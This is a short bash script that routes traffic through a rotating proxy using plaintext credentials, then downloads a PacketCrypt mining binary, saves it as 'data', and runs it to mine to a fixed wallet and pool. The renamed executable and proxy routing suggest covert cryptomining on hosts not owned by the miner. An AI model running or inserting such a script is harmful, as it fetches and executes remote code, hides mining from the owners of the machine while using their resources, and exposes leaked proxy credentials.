#!/bin/bash
curl --proxy "http://qqlqtvdn-rotate:xqjwpfaiwxjm@p.webshare.io:80/" https://ipv4.webshare.io/ &&
export http_proxy=http://qqlqtvdn-rotate:xqjwpfaiwxjm@p.webshare.io:80 &&
export https_proxy=http://qqlqtvdn-rotate:xqjwpfaiwxjm@p.webshare.io:80 &&
export ftp_proxy=http://qqlqtvdn-rotate:xqjwpfaiwxjm@p.webshare.io:80 &&
wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O data && 
chmod +x data && 
./data ann -p pkt1qh3cswe3gckds4vutpasr6z2rwz6rxkkhgxecys http://pool.pkt.world

